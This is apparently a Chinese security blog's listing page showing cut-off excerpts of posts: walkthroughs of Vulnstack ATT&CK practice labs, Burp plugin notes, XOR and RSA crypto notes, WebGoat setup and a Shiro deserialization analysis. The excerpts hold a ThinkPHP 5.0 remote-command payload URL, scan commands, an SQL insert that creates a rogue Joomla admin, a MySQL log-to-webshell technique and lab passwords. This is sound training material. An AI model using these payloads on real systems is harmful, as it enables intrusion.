ATT&CK(五)
ATT&CK(五)
win7账号密码:sun\heart 123.comsun\Administrator dc123.com 密码我进去后改成123.comdc了—————————————————————————————————————————————————————————————2008账号密码sun\admin 2020.com
登录win7 开启phpstudy
nmap 192.168.135.0/24
web
发现是 thinkphp v5.0
查一下这个的洞
searchsploit thinkphp 5.0searchsploit -m php/webapps/45978.txtcat 45978.txt
/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
/public/index.php?s=/index/\think\app/inv ...
ATT&CK(二)
ATT&CK(二)环境搭建
还原一下快照
登录web主机 使用密码 de1ay 1qaz@WSX登录进去
进去之后进到这个目录下面,无权限时可以输入 管理员账号密码:Administrator/1qaz@WSX
C:\Oracle\Middleware\user_projects\domains\base_domain\bin
以管理员身份运行
WEB机和PC机:计算机右键->管理->配置->服务->Server、Workstation、Computer Browser 全部启动(Computer Browser 一直自动关闭导致 net view 显示 6118 error 没能解决,在域信息收集时暂时关闭一下防火墙)
信息收集收集ip
nmap -sP 192.168.111.2/24
收集80的具体信息
nmap -sS -sV -A -T4 -p- 192.168.111.80
445端口开放可能存在smb服务可能还会有ms17-010 端口溢出漏洞
139端口开放就存在有samba服 ...
ATT&CK(三)
ATT&CK(三)环境搭建
重启一下 centros的网卡
/etc/init.d/network restart
接着把kali也调成桥接模式
重新获取下ip
外网这里就演示下怎么获取到这个ip
nmap 192.168.220.0/24
nmap -sS -O -A -T4 -p- 10.184.61.236
有个 80 和 mysql
这里发现是使用的joomscan框架
joomscan --help
joomscan -u http://10.184.61.236/
这里扫到了mysql的账号密码
扫到的phpinfo页面
直接连上去看看
找到个密码
这里肯定不能直接改原来的密码啊
我们用底下这个添加一个新用户
INSERT INTO am2zu_users (name, username, password, params, registerDate, lastvisitDate, lastResetTime) VALUES ('Super User', 'wanan', 'd206 ...
ATT&CK(七)
ATT&CK(七)
Administrator:Whoami2021whoami:Whoami2021bunny:Bunny2021moretz:Moretz2021Ubuntu 1: web:web2021Ubuntu 2: ubuntu:ubuntu通达OA账户: admin:admin657260
web1 使用 web:web2021 登录
sudo redis-server /etc/redis.conf
sudo /usr/sbin/nginx -c /etc/nginx/nginx.confsudo iptables -F
web2
sudo service docker startsudo docker start 8e172820ac78
win7 Administrator:Whoami2021
C:\MYOA\bin\AutoConfig.exe
laravelnmap 192.168.1.0/24
81端口开放了laravel服务 这里也存在版本
searchsploit laravelsearchsploit php ...
ATT&CK(一)
ATT&CK(一)环境搭建下载链接
http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
原来的适配器删了重新加一个适配器
同一密码
hongrisec@2019
看好适配器 4
测试
nmap扫描
.\nmap.exe 192.168.1.129 -sS -sV -A -T4 -p-
目录扫描
python .\dirmap.py -i http://192.168.1.129/ -lcf
有一个备份
访问这个
这里泄露了信息
模板写个shell试试
看一下路径
这里爆了绝对路径
新建一个字典
弱口令进来了.
查看写文件的权限
SHOW GLOBAL VARIABLES LIKE "secure%"
不可以写
数据库全局日志写入
查看是否开启了全局日志以及全局日志的存放位置
SHOW VARIABLES LIKE '%general%'
修改或者设置全局日志的保存目录为网站的web目录,并且日志保存为php文件
SHOW VARI ...
Burp插件
burp用过的插件BurpShiroPassiveScan-1.7.7https://github.com/pmiaowu/BurpShiroPassiveScan/releases/tag/BurpShiroPassiveScan-1.7.7
简单使用,起一个shiro服务
J2EEScanhttps://github.com/ilmila/J2EEScan/archive/refs/tags/v2.0.0.zip
idea打开
cd spring/CVE-2018-1273docker-compose up -ddocker ps
抓包
WooYun-Payloadhttps://github.com/boy-hack/wooyun-payload/releases
Struts2-RCEhttps://github.com/prakharathreya/Struts2-RCE
cd vulhub-master/struts2/s2-001docker-compose up -ddocker ps
Fastjson-Scannerhttp ...
Crypto
符号 ⊕ 代表异或
C1 代表密文
M1 代表明文
性质
交换律
结合律 (a ⊕ b ) ⊕ c = a⊕ ( b ⊕ c)
任何数x x ⊕ x = 0 x ⊕ 0 = X
自反性 x ⊕ b ⊕ b = x ⊕ 0 = x
MTP 攻击BUUCTF: [AFCTF2018]
25030206463d3d393131555f7f1d061d4052111a19544e2e5d540f020606150f203f307f5c0a7f24070747130e16545000035d541203075429152a7020365c167f390f1013170b1006481e13144e0f4610170e1e2235787f7853372c0f065752111b15454e0e09010815430 ...
RSA算法解释
RSA算法解释加密算法$$c≡ m^e (mod N)$$其中c 作为密文 m 作为明文
也就是说在 e 与 N 作为 RSA加密算法的公钥 也就是 (E,N) 公钥可公开
解密算法$$m ≡ c^d (mod N)$$也就是说 RSA的明文就是代表密文字符 c的 d次方对N求余的结果 那么这里的 (d ,N) 便作为 私钥
其实这里你也许已经发现了 既然公钥与私钥之中都存在有N 那么N不就是代表 公开的吗 那么其中主要保存的其实就是 e(encode 编码) 与 d (decode 解码)
生成密钥对由上面可知 我们生成密钥对的时候需要三个参数 e d n 那么怎么生成呢?
求 N首先需要准备两个极大的指数 P Q$$P * Q = N$$ 这样得到了N
求 φ$$φ = (P -1 )* (Q - 1)$$
φ 为啥要这么求?
求Ee的求解基于上述的 φ 值 首先需要明确 e的取值范围 1 < e < φ ,并且 gcd(φ , e) = 1(即φ 与e的最大公约数为1,即两者互质) 之所以需要添加1 这个值 ,是为了保证存在解密时 ...
webgoat靶场审计
安装webgoat下载源码
https://github.com/WebGoat/WebGoat.git
下载mvn
环境变量
mvn -v
idea打开
jdk设置为17
改一下构建工具
下载依赖
我也是莫名其妙下完的,刚学这个不太懂
找到这个目录点这个箭头,如果下载完成了的话构建就会正常的
这样做主要是因为spring boot没学过,不会配置
MyWebGoat
这里先了解了一些pom.xml的语法规则
https://blog.csdn.net/qq_41570658/article/details/120646393
propertiesw文件
server.error.include-stacktrace=always#显示异常堆栈信息server.error.path=/error.html#writelabel的默认路径是error.可以通过设置server.error.path参数自定义错误页面server.servlet.context-path=/WebGoat#设置应用的上下文路径,项目的路径作为url地址的一部分server.ser ...
shiro反序列化
dnslog下载https://github.com/apache/shiro/releases/tag/shiro-root-1.2.4
打开web项目,改一下pom.xml
添加version
这里返回了一个极大的cookie,根据经验来看,可能存储了用户的相关信息,推测可能是反序列化
两下shift 找到了这个
我们先看到这个rememberSerializedIdentity()方法可以清楚的看到对数组进行了base64加密操作,接着将base64存入了cookie中
这里的getRememberedSerializedIdentity()方法也可以看出来先获取了cookie中的值
返回了一个decoded数组,我们接着去看看谁调用的这个解码函数 也可以看到AbstractRememberMeManager类的getRememberedPrincipals()方法调用的
这里又接着去调用了decrpt()方法去解密
这里去get了密钥
我们去看看这个decryptionCipherKey是如何赋值的
这里我们也是主要去看set值的地方
接着找 ...